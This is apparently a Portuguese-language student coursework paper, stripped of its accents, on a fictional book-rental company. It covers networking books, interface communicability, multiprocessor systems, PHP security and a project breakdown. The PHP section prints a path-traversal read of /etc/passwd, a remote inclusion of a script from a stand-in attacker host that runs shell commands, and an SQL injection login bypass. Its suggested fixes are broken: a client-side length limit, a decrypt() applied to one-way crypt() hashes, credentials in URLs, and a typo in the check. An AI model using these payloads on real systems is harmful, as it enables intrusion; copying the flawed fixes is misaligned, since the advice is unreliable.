Vous êtes sur la page 1sur 27

SISTEMA DE ENSINO PRESENCIAL CONECTADO

CURSO SUPERIOR DE TECNOLOGIA EM ANLISE E DESENVOLVIMENTO DE SISTEMAS

Hlex Batista Fontes

Trabalho Individual Produo Textual Interdisciplinar

Pedra Azul 2013

Hlex Batista Fontes

Trabalho Individual Produo Textual Interdisciplinar

Trabalho apresentado ao curso Superior de Tecnologia em Anlise e Desenvolvimento da Universidade Norte do Paran- UNOPAR Reinaldo Nishikawa Marcos Ikuro Hisatomi Adriane Aparecida Loper Everson Morais Paulo Kiyoshi Nishitani Veronice de Freitas

Pedra Azul 2013

Sumrio 1. Introduo 2. Objetivo 3. Desenvolvimento 4. Concluso 5. Referncias

1. INTRODUO Neste contexto foram apresentados alguns equipamentos e programas necessrios para atender a uma suposta necessidade de se oferecer livros digitais. De acordo com as caractersticas da empresa foi identificado qual tcnica de armazenamento de dados poder ser utilizado com a devida explicao do motivo da escolha. Considerando o estudo de caso e o desenvolvimento de um sistema para a empresa em pauta,foram aplicadas algumas tcnicas de gerenciamento, onde pela elaborao de atividades necessarias para a anaise do projeto de sistema chegaremos em um resultado satisfatorio para a empresa.

2. Objetivo Trabalhar o contedo do eixo temtico, incentivar a interatividade e a regionalidade e auxiliar na aplicao dos conceitos estudados.

3. DESENVOLVIMENTO: Com base no cenrio proposto Nossa Locadora de Livros, elabore as atividades de acordo com as seguintes diretrizes: 3.1. Considerando que a nossa locadora tambm ser composta por livros digitais pesquise junta internet pelo o menos 6 livros de Redes de Computadores referenciando obra e autor. Redes de Computadores para Leigos No livro de Redes de Computadores para Leigos voc encontrar informaes de como montar e grenciar uma rede de computadores, do bsico at as ferramentas e tendncias mais atuais. - Administrar redes - Lidar com TCP/IP - Conectar-se internet - Gerenciar um servidor - Criar uma intranet Sobre o autor: Doug Lowe diretor de TI de uma empresa de engenharia civil na Califrnia, Estados Unidos. Ele gerencia redes h mas de 20 anos e o autor dos Best-sellers sobre informtica. Ttulo Redes de Computadores para Leigos Autor Doug Lowe Editora Alta Books Pginas 424 Edio 1 Ano 2011 Idioma Portugus - Montar uma rede desde o incio - Utilizar cabos e roteadores - Otimizar o desempenho - Proteger a rede - Gerenciar o uso da rede

Assunto Informtica Redes Ttulo: Redes de Computadores - Curso Completo Autor: Jos Gouveia / Alberto Magalhes N pgs.: 328 Descrio Sendo a rea de redes de computadores bastante alargada e com um surgimento contnuo de novas tecnologias, esta obra vem ao encontro das necessidades de utilizadores domsticos, autodidactas e estudantes. Esta nova edio, cujo texto foi revisto de acordo com sugestes de diversos leitores, abrange as temticas de redes wireless, ligaes bluetooth, configurao de redes locais, routers e firewalls, tendo tambm sido actualizada de modo a acompanhar o desenvolvimento das tecnologias. A configurao de servios, como o DHCP, pode parecer algo complicado, mas a leitura desta obra mostra que, afinal, pode ser extremamente simples. O mesmo se verifica com a tolerncia a falhas, utilizada em servidores e que permite a continuidade do funcionamento de determinados servios no caso de falha do hardware. Principais Tpicos Topo Ao longo do livro so abordados, entre outros, os seguintes temas: Introduo s redes de computadores O Modelo OSI e o TCP/IP Normas de Redes e Tecnologias WLAN Instalao de uma Ethernet Instalao de uma rede wireless Configurao de um router Tolerncia a falhas e segurana Detectar problemas na rede Firewalls

Pblico Alvo Topo Utilizadores domsticos, autodidactas e estudantes.

O(s) Autor(es) Topo

Jos Gouveia Certificado como CCNA e Linux CM CertifiedTechnician, coordenador e formador nas reas de Redes e Linux e responsvel pelo departamento tcnico de uma empresa de formao na rea de Informtica. Co-autor das obras Hardware PCs e Perifricos Curso Completo, 4 Edio Actualizada e Aumentada, Curso Tcnico de Hardware Curso Completo, 5 Edio Actualizada, editadas pela FCA. Alberto Magalhes Profissional de informtica e electrnica desde 1980. Responsvel pelo departamento de suporte e manuteno de uma empresa de informtica. Formador na rea de hardware e Redes. Co-autor das obras Hardware PCs e Perifricos Curso Completo, 4 Edio Actualizada e Aumentada, Curso Tcnico de Hardware Curso Completo, 5 Edio Actualizada, editadas pela FCA. Livro - Redes de Computadores - Verso Revisada e Atualizada O maior autor de hardware e redes do mercado nacional, Gabriel Torres, finalmente acertou seu retorno aos livros, aps sete anos longe das prateleiras. Aguardado como o grande lanamento do ano em Tecnologia, Redes de Computadores ? Verso Revisada e Atualizada, nova obra do autor best-seller do gnero, chega ao mercado editorial brasileiro pela Editora NovaTerra. A obra tem por objetivo ensinar ao leitor, em profundidade, tudo o que precisa saber sobre o tema, seja ele um estudante, um autodidata, um profissional da rea ou mesmo um usurio que deseja aprender a montar uma rede segura por conta prpria. Seguindo sua marca registrada, o autor utiliza linguagem simples, objetiva e didtica, que pode ser compreendida por leitores em diferentes nveis de conhecimento. Em Redes de Computadores? Verso Revisada e Atualizada, os leitores conhecero as classificaes dos diversos tipos de redes, toda a teoria do funcionamento de redes, os protocolos TCP/IP (inclusive o IPv6) em detalhes, as principais arquiteturas de redes locais (com foco em Ethernet e o novo padro de 10 Gbps) e distncia (X.25, Frame Relay e ATM), tudo sobre as redes Wi-Fi, tutoriais para montar redes caseiras ou comerciais usando o Windows, como montar servidores DNS, web, banco de dados e e-mail (incluindo roteiros detalhados e

inmeras dicas), os detalhes para manter a segurana em dia, com passo a passo para descobrir falhas e dicas para evitar que a sua rede fique vulnervel. Descrio do Produto Principais Caractersticas Ttulo Redes de Computadores - Verso Revisada e Atualizada Pginas 800 Edio 2 Editora Novaterra Ano 2009 Assunto Informatica-Redes Idioma Portugus Livro - Redes de Computadores Redes de Computadores traz os conceitos bsicos do assunto: j no incio do livro os autores tratam das comunicaes de dados (multiplexao, sinalizao e codificao), para depois introduzir o modelo de referncia OSI. Em seguida, equipamentos de rede e tecnologias so discutidos. Com essa base, os protocolos das camadas de enlace e rede so apresentados partindo-se da pilha de protocolos TCP/IP para propor outras pilhas. A estrutura do texto permite aos estudantes exercitar e sintetizar os contedos tratados em cada captulo. Esta obra possui caractersticas que a tornam uma excelente escolha para livro-texto dessas disciplinas, pois aborda os conceitos bsicos, tecnologias e protocolos de redes, associados a uma viso prtica e a exerccios que estimulam os estudantes a sintetizar o contedo abordado. Ttulo - Redes de Computadores Autor - Diane Barrett; Todd King Editora - LTC Pginas - 500 Edio - 1

Ano - 2010 Assunto - Informtica Idioma - Portugus Livro - Use a Cabea! Redes de Computadores Frustrado de ler livros sobre networking cheios de siglas que colocam seu crebro em modo de espera? Este livro seu parceiro na sua jornada passo a passo de administrador de rede junior at guru, no apenas com respostas, mas tambm com as explicaes para suport-las. Este livro suja suas mos para resolver problemas de rede reais. Voc est procurando problemas na sua rede de fibra? Voc acabou de descobrir que as plantas que voc recebeu deixaram de fora passagens de cabos maiores? Seja DHCP ou NAT, mapeamento de porta ou fraude de IP, roteadores ou switches, voc vai aprender o que est realmente acontecendo ...e como resolver os problemas que podem parar sua rede. Como todos os livros da srie Use a Cabea!, este usa um formato visualmente rico desenvolvido para a maneira como o crebro funciona. Baseado nas ltimas pesquisas em neurobiologia, cincia cognitiva, e teoria de

aprendizagem, este livro combina palavras e figuras em um estilo atraente e de mdia mista que no somente ajuda os leitores a entenderem um assunto, mas tambm a lembr-lo. Ttulo - Use a Cabea! Redes de Computadores Pginas - 528 Edio - 1 Editora - Alta Books Ano - 2010 Assunto - Informtica Idioma - Portugus Livro - Redes de Computadores

Este livro apresenta o funcionamento das redes e seus respectivos protocolos (TCP/IP), utilizando vrios meios fsicos, onde se destacam as redes sem fio (wireless) muito em voga atualmente, as ligaes bluetooth entre PCs e celulares e a configurao de roteadores a partir de um sistema Linux. Ttulo - Redes de Computadores Subttulo - Curso Completo Pginas - 274 Edio - 1 Editora - LTC Ano - 2007 Assunto - Informtica Idioma Portugus Livro Redes O leitor encontra nesta obra os fundamentos de redes de computadores descritos em linguagem simples e objetiva, com casos reais de uso. Aborda mdias de transmisso, conceitos de sistemas de comunicao, tecnologias de redes locais e de longa distncia, alm de protocolos e TCP/IP. Destaca as redes privadas virtuais (VPN), redes sem fio (WiFi) e convergncia de redes, dando especial ateno a VoIP (voz sobre IP). A partir da sexta edio foram incorporadas novas tecnologias como Ethernet 10 Gigabits e WiFi 802.11n, alm de noes de IP verso 6.0. Tambm h um captulo que enfatiza a segurana em redes, que trata de assuntos pertinentes como criptografia, firewalls, sistemas de deteco e preveno de intruses e biometria. Editora - rica Edio - 7 Nmero de Pginas - 256 Origem - Nacional Idioma - Portugus Data de Lanamento - 2008

Redes de Computadores Subttulo - fundamentos Autor - Alexandre Fernandes de Moraes 3.2. Quando trabalhamos a comunicabilidade, cujo objetivo deste conceito como (design) a informao apresentada ao usurio para trazer benefcios. Como podemos aplicar este conceito em nossa locadora de livros. Justifique. Podemos dizer que, dentro de um ambiente de testes de usabilidade, se o usurio se perder dentro da interface e no souber que rumo tomar adiante, ou mesmo se ele no conseguir interpretar os itens de interface do aplicativo, estamos diante de uma quebra de comunicabilidade. O computador no , como muitos ainda imaginam, uma mquina inteligente. Ele no faz nada sozinho; fundamental que ns digamos ao computador o que fazer, e quando fazer. Para isso, necessrio que ns estabeleamos um dilogo com a mquina, a fim de dar ordens para ela. Em outras palavras, temos que estabelecer comunicao com o computador. Por outro lado, para que um aplicativo possa executar as suas tarefas adequadamente, ele deve receber comandos claros e inequvocos, e dar ao usurio a correta idia de suas funes, bem como das respostas s suas requisies. Deve ser estabelecido, em outras palavras, um dilogo entre esse aplicativo e o usurio, e esse dilogo chamado de interface. Estranho, no ? No, meus amigos: atravs da interface (mais precisamente, de seus elementos, como cones e itens de menu) que so fornecidos os comandos de entrada para o aplicativo. Tambm pela interface que o aplicativo apresenta o resultado das tarefas a ele confiadas, isto , o resultado do seu processamento. E para que no haja erros, essa interface deve fornecer um dilogo sem ambigidades, sem termos obscuros e funes quase inacessveis. Desta forma, quando existe um erro, um gap na interface, pode-se dizer que ali existe uma grande possibilidade de ocorrerem falhas de comunicabilidade na mesma. Uma falha de comunicabilidade, segundo ocorre quando o usurio precisa se desviar da interao rumo ao objetivo a ser alcanado para buscar o entendimento da prpria interao.

Dentro deste quadro, podemos dizer que, dentro de um ambiente de testes de usabilidade, se o usurio se perder dentro da interface e no souber que rumo tomar adiante, ou mesmo se ele no conseguir interpretar os itens de interface do aplicativo, estamos diante de uma quebra de comunicabilidade. E, se h uma quebra de comunicabilidade, certamente existe algo a ser corrigido. Para se captar as quebras (ou falhas) de comunicabilidade em um aplicativo, fundamental que saibamos cada passo que o usurio executou no aplicativo. E isso, meus amigos, no dispensa uma boa gravao de interao. fundamental que sejam gravadas as telas do aplicativo com a seqncia de aes do usurio, para posterior anlise. Tambm interessante (embora no fundamental) que sejam gravadas as informaes de vdeo e udio do usurio. A cmera de vdeo deve estar posicionada para captar as suas expresses faciais, e o udio deve captar a sua conversao com o avaliador, bem como ocasionais manifestaes solo do usurio. Durante a execuo das tarefas, um teste de comunicabilidade absolutamente igual a um teste emprico tradicional. Os mesmos passos so seguidos: explicar o teste, mostrar os direitos do usurio e assinar o termo de compromisso, executar as tarefas, etc. A grande diferena est na anlise dos dados, onde feito um passo adicional a etiquetagem das quebras de comunicabilidade, comunicabilidade. As expresses de comunicabilidade so as seguintes: Quando acontece? Quando o usurio quer achar alguma funcionalidade, e no a consegue encontrar na interface em um primeiro momento. Quais os sintomas? Ficar passeando com o cursor do mouse sobre menus e botes da interface. que feita conforme as chamadas expresses de

importante, caso esteja-se usando diferentes aplicativos para obeter udio, vdeo e telas de interao, a sincronizao dos dados, para que estes possam complementar-se e dar um quadro completo das razes da ocorrncia de uma quebra de comunicabilidade. Tambm sincroniza-se o vdeo com as anotaes derivadas da observao do usurio. Com essas informaes sincronizadas, pode-se localizar onde esto as quebras de comunicabilidade e passar para uma das duas alternativas: Aplicar-se diretamente uma soluo, se esta for simples e/ou bvia, ou; Proceder a algum outro mtodo de teste, para avaliar se aquele item da interface realmente apresenta algum problema. 3.3. Realize uma pesquisa sobre os sistemas multiprogramveis e com mltiplos processadores, identificando suas caractersticas predominantes. Multiprogramveis ( multiusurio): Se caracterizam por permitir que vrios programas compartilhem diversos recursos. O SO se preocupa em gerenciar o acesso concorrente aos seus diversos recursos, como memria, processador e perifricos, de forma ordenada e protegida, entre os programas. Com o compartilhamento de recursos, tem-se um aumento na produtividade e a reduo de custos. Estes sistemas podem ser classificados em: a)batch; b) de tempo compartilhado; c) de tempo real. Um SO pode suportar um ou mais desses tipos de processamento. a. Sistemas batch (lote): Caracterizam-se por terem seus programas armazenados em disco ou fita, onde esperam para ser executados seqencialmente. Alguns exemplos de aplicaes originalmente processadas em batch so compilaes, linkedies, sorts, backups e todas aquelas onde no necessria a interao com o usurio. Esses sistemas, quando bem projetados, podem ser bastantes eficientes, devido melhor utilizao do processador. Entretanto, podem oferecer tempos de resposta longos, em face do processamento puramente seqencial e com uma variao alta dos seus tempos de execuo. b. Sistemas de tempo compartilhamento (time-sharing): O usurio pode interagir diretamente com o sistema em cada fase do desenvolvimento de suas

aplicaes e, se preciso, modific-las imediatamente. Devido a esse tipo de interao, estes sistemas tambm so conhecidos com on-line. Esses sistemas possuem uma linguagem de controle que permite ao usurio comunicar-se diretamente com o SO para obter informaes, como por ex., verificar os arquivos que possui armazenados em disco. O sistema, normalmente, responde em poucos segundos maioria desses comandos. Para cada usurio, o SO aloca uma fatia de tempo (time-slice) do processador. Caso o programa do usurio no esteja concludo nesse intervalo de tempo, ele substitudo por um de outro usurio, e fica esperando por uma nova fatia de tempo. c. Sistemas de tempo real (real time): So semelhantes em implementao aos sistemas de tempo compartilhado. A maior diferena o tempo de resposta exigido no processamento das aplicaes. Enquanto em sistemas de tempo compartilhado o tempo de resposta pode variar sem comprometer as aplicaes em execuo, nos sistemas de tempo real os tempos de resposta devem estar dentro de limites rgidos, que devem ser obedecidos, caso contrrios podero ocorrer problemas irreversveis. Nos sistemas de tempo real no existe a idia de fatia de tempo, utilizada pelos sistemas de tempo compartilhado. Um programa detm o processador o tempo que for necessrio, ou at que aparea outro prioritrio em funo de sua importncia no sistema. Esta importncia ou prioridade de execuo controlada pela prpria aplicao e no pelo SO, como nos sistemas de tempo compartilhado. Esse sistemas esto pressentes nas aplicaes onde o tempo de resposta fator fundamental. Sistemas com Mltiplos Processadores: Caracterizam-se por possuir duas ou mais UCPs interligadas, trabalhando em conjunto. Um fator-chave no

desenvolvimento de SOs com mltiplos processadores a forma de comunicao entre as UCPs e o grau de compartilhamento da memria e dos dispositivos de entrada e sada. Sistemas com mltiplos processadores possibilitam aumentar a capacidade computacional com menor custo (escalabilidade), alm de permitir a reconfigurao e o balanceamento do sistema. Em funo desses fatores, podemos classificar os sistemas em a)fortemente acoplados ou b)fracamente acoplados. a. Sistemas fortemente acoplados: nestes sistemas existem vrios

processadores compartilhando uma nica memria e gerenciados por apenas um

sistema operacional. Mltiplos processadores permitem que vrios programas sejam executados ao mesmo tempo, ou que um programa seja dividido em subprogramas, para execuo simultnea em mais de um processador. Dessa forma, possvel ampliar a capacidade de computao de um sistema, adicionado-se apenas novos processadores, com custo inferior aquisio de outros computadores. Com o multiprocessamento, novos problemas de concorrncia foram introduzidos, pois vrios processadores podem estar acessando podem estar as mesmas reas de memria. Alm disso, existe o problema de organizar de forma eficiente os processadores, a memria e os perifricos. Os sistemas fortemente acoplados podem ser divididos conforme a simetria existente entre seus processadores, ou seja, se todos os processadores podem executar ou no as mesmas funes. a.1 Sistemas Assimtricos: caracterizam-se por possuir um processador primrio, responsvel pelo controle dos demais processadores (secundrios) e pela execuo do sistema operacional. Os processadores secundrios apenas

processam programas de usurios e, sempre que necessitam de um servio do sistema, solicitam ao processador primrio. Uma conseqncia dessa organizao que, se o processador mestre falhar, todo o sistema ficar incapaz de continuar o processamento. Neste caso, o sistema deve ser reconfigurado, fazendo um dos processadores escravos assumir o papel de mestre. Mesmo sendo uma organizao simples de implementar e quase uma extenso dos sistemas multiprogramveis, esse tipo de sistema no utiliza eficientemente o hardware, devido assimetria dos processadores, que no realizam as mesmas funes. a.2 Sistemas Simtricos: ao contrrio da organizao mestre/escravo, implementa a simetria dos processadores, ou seja, todos os processadores realizam as mesmas funes. Apenas algumas poucas funes ficam a cargo de um nico processador, como, por exemplo, a inicializao (boot) do sistema. Como vrios processadores esto utilizando, independentemente, a mesma memria e o mesmo sistema operacional, natural a ocorrncia de acessos simultneos s mesmas reas de memria. A soluo desses conflitos fica a cargo do hardware e do sistema operacional. No processamento simtrico, um programa pode ser executado por qualquer processador, inclusive por vrios processadores ao mesmo tempo (paralelismo).

Alm disso, quando um processador falha, o sistema continua em funcionamento sem nenhuma interferncia manual, porm com menor capacidade de computao. Os sistemas simtricos so mais poderosos que os assimtricos, permitindo um melhor balanceamento do processamento e das operaes de entrada/sada, apesar de sua implementao ser bastante complexa. 3.4. Faa uma pesquisa em segurana de cdigos PHP. A flexibilidade do PHP que ele uma ferramenta til ao desenvolvimento de sistemas para internet, mas esta mesma flexibilidade pode ser usada de forma inadequada por usurios mal intencionados e proporcionar vulnerabilidades no servidor. fundamental restringir ao mximo a visualizao das informaes que trafegam pelos cabealhos HTTP, e certificar-se de que estas sejam postadas de um lado e recebidas de outro dentro de critrios definidos pelo programador. A m utilizao das funes include(), require() e fopen() alm da configurao das varives globais no servidor fundamental para manter um nvel de segurana adequado. Analizamos o seguinte exemplo: Um programador desprevinido se utiliza do mtodo de fast templates para mostrar contedo dinmico na pgina, a cada link clicado a funo include chamada para mostrar novo contedo na pgina, a funo include recebe da varivel $link qual ser este contedo, passando o mouse pelo link em questo vemos: http://exemplo.com.br/exemplo.php?link=faleconosco.html Neste caso (o que j vi por a na web), devemos considerar o seguinte: - Foi verificado a extenso do arquivo antes de passar o valor de $link para a funo include? - Os diretrios transversais so permitidos? - permitido arquivos remotos?

Se a resposta no para apenas uma destas perguntas este servidor est a prestes a ser invadido. Considere o seguinte: http://exemplo.com.br/exemplo.php?link=../../../etc/passwd E pronto, todas as senhas do servidor so pblicas. http://exemplo.com.br/exemplo.php?link=paghacker.com.br/exec.php Onde exec.php contm: <?php passthru('id'); passthru('ls -l /etc'); passthru('ping -c l paghacker.com.br'); passthru('echo Voc foi hackeado | mail root'); ?> Seu /etc pblico .... Acho que deu para ter uma idia do que pode ser feito se utilizando desta vulnerabilidade. Outra vulnerabilidade muito explorada so telas de login tipo usurio e senha, em muitas pginas j encontrei aqueles que incluem as variveis diretamente a uma string sql, o que torna o login numa piada. Examine o seguinte exemplo: <input type=text name=login> <input type=password name=senha> Isso gera as variveis $login e $senha. Na pgina seguinte encontramos: <?php $sql = "SELECT * FROM users WHERE user=$login AND pass=$senha";

?> Perfeito, est pronta a ser invadido, realize se o usurio digitar OR "1=1" no login e senha, teremos: <?php $sql = "SELECT * FROM users WHERE user= OR '1=1' AND pass= OR '1=1'"; ?> Ou seja, $user = a nada OR 1=1 -->passou $senha = a nada OR 1=1 -->passou e pode-se fazer muito mais.... E o usurio est conectado ao sistema. Pode parecer ridculo mas o nmero de pginas em que estas falhas podem ser encontradas so inmeras pois tem a impresso de que a segurana est apenas a cargo do adminitrador de rede, bvio que um servidor bem configurado evita muitas destas vulnerabilidades, mas no d para confiar. Para diminiur a vulnerabilidade ou evitar que invases ridculas como estas aconteam podemos nos utilizar de pequenos cuidados no cdigo da tela de login por exemplo: <input type=text name=login maxsize=5> <input type=password name=senha maxsize=5> S isto j ajuda bastante pra comear, o invasor no poder digitar o que quiser para login, determine limite para seus usurios. Isso o bsico, alm disto preciso usar criptografia para passagem de variveis, abaixo seguem alguns exemplos: Este arquivo o login.php <?php if (!$flag) {

?> <form name="login" action="login.php"> <input type="text" name="login" maxsize="5"> <input type="password" name="senha" maxsize="5"> <input type="hidden" name="flag" value="1"> </form> <?php } else { $log = crypt(strtoupper($login), "d19"); $snh = crypt(strtoupper($senha), "b8"); ?> <form name="autentica" action="autentica.php?l=<?php echo $log; ?>&s=<?php echo $snh; ?>" method="POST"> </form> <script language="javascript"> autentica.submit(); </script> <? } ?> Do outro lado no autentica.php: <?php $login = decrypt(strtoupper($log), "d19"); $senha = decrypt(strtoupper($snh), "b8");

?> Esta etapa permite o sigilo das informaes que trafegam pela Internet, e dificulta um pouco mais a tentava de logins no permitidos. Mas o essencial a utilizao de expresses regulares que verificam a consistencia destes informaes, podemos nos utilizar delas para verificarmos a insero de comandos SQL nas variveis, verificar extenses antes de submetelas a includes, requires e fopens. As expresses regulares podem tambm verificar um contexto pre-definido para senhas por exemplo, mas para tanto preciso que voc defina o padro de senha e gere as mesmas dinamicamente para seu usurio. Vejamos um exemplo para nosso caso: Ainda no autentica.php, abaixo da desemcriptao verificamos a consistencia das variveis recebidas. <?php $check1 = 0; $check2 = 0;

if (ereg("^[a-z]+\.@", $login)) { $check1 = 1; } else { echo ("Vai hackear outro site !"); } if (ereg("[0-9]{5}", $senha)) { $check2 = 1; } else { echo ("Vai hackear outro site !");

} if ($check1 == 1 AND check2 == 1) { //submeta os valores } ?> Sendo que meus login tem como padro terminar com @ e minhas senhas so sempre numricas de 5 dgitos. E as variveis esto prontas para serem includas na string SQL 3.5. (Marco) Considerando o estudo de caso Nossa Locadora de Livros, descreva como voc atenderia as necessidades deste projeto com base nos conhecimentos da disciplina de Projeto de Sistemas. I) Elaborar a relao das atividades necessrias para a anlise do projeto do sistema, com os respectivos responsveis (papeis). II) Desenvolver o Cronograma das atividades desenvolvidas no item I.

I)

A relao das atividades: No processo de engenharia de requisitos, um prottipo pode ajudar na

descoberta e validao dos requisitos do sistema. No processo de projeto do sistema, um prottipo pode ser usado para explorar solues especficas de software e apoiar o projeto de interface com o usurio. No processo de teste, um prottipo pode ser usado para realizar testes completos com o sistema que ser entregue para o cliente. II) WBS Projeto Nossa Locadora de Livros 1. Desenvolvimento do Sistema 1.1 Gerenciamento de Projeto 1.2 - Infraestrutura de desenvolvimento 1.2.1 Hardware 1.2.2 Software

1.3 Levantamento 1.3.1 Identificao de usurios 1.3.2 Entrevistas 1.3.3 Documentao e apresentao 1.4 Implementao do Projeto 1.4.1 Prototipagem 1.4.1.1 Desenho de telas 1.4.1.2 Relatrio de aceitaes 1.4.1.3 Realizao de alteraes 1.4.1.4 Aceite do cliente 1.4.2 Desenvolvimento 1.4.2.1 Modelagem 1.4.2.1.1 Modelo funcional 1.4.2.1.2 Modelo de dados 1.4.2.1.3 Projeto fsico 1.4.2.2 Codificao 1.4.2.2.1 Implementao do programa 1.4.2.2.2 Converso de dados 1.4.3 Plano de Teste 1.4.3.1 Testes internos 1.4.3.2 Testes usurios 1.4.4 Ajustes e correes 1.4.5 Documentao 1.4.5.1 Manual Sistema 1.4.5.2 Manual usurio 1.4.5.3 Manual Operao 1.4.5.4 Material de treinamento

1.5 Implantao do Projeto 1.5.1 Configurao infra-estrutura 1.5.2 Instalao do sistema 1.5.3 Teste do cliente 1.5.4 Treinamento 1.5.5 Operao assistida 1.5.5.1 Ajustes e correes 1.6 Fechamento 1.5.5.2 Acompanahmento 1.6.1 Aceite formal do cliente 1.6.2 Relatrio do projeto 3.4.3 - Cronograma do Projeto 3.4.4 - Relatrio de Validao de Escopo e de Requisitos Aps a documentao dos requisitos ter sido produzida, inicia-se o processo de validao, buscando checar se os requisitos esto certos, ou seja, descritos de forma apropriada, procurando eliminar problemas de incompleteza, ambigidade ou inconsistncia. A preocupao maior desta fase com a qualidade do documento de requisitos produzido. Para esta fase tambm recomendado o uso de check-list que deve identificar, entre outras coisas: a) os requisitos podem ser entendidos claramente? b) os requisitos no possuem informao repetida desnecessariamente? c) os requisitos atendem completamente as necessidades do cliente? d) existe alguma informao que deveria estar descrita no documento? e) os requisitos podem ser interpretados de forma diferente por diferentes usurios? f) os requisitos no geram contradio entre si? g) os requisitos esto organizados de forma adequada? h) os requisitos esto em conformidade com os padres estabelecidos?

i) os requisitos podem ser rastreados, possuem ligaes com outros requisitos que possuem relao e a razo de sua existncia est documentada?

4. CONCLUSO Neste trabalho abordamos atualizaes para a nossa Locadora de livros onde iremos atualizar para livros digitais. Outro aspecto diz respeito poltica de segurana para a empresa onde foram abordados quatro itens que so essenciais para sua implementao, mais especificamente no caso em estudo o da proteo da informao, cuja posio no mundo atual de extrema importncia, devendo existir um censo comum entre todas as partes que envolvem uma empresa, no sentido de preserv-la colocando em prtica a maior parte dos conceitos que envolve esta temtica.

5. REFERNCIAS
http://forum.imasters.com.br/topic/334744-resolvido-sistemas-com-mltiplos-processadores/

Projeto de sistemas livro coleo Pearson Unopar Virtual Sistemas operacionais livro coleo Pearson Unopar Virtual
http://www.phpbrasil.com/articles/article.php/id/291

Vous aimerez peut-être aussi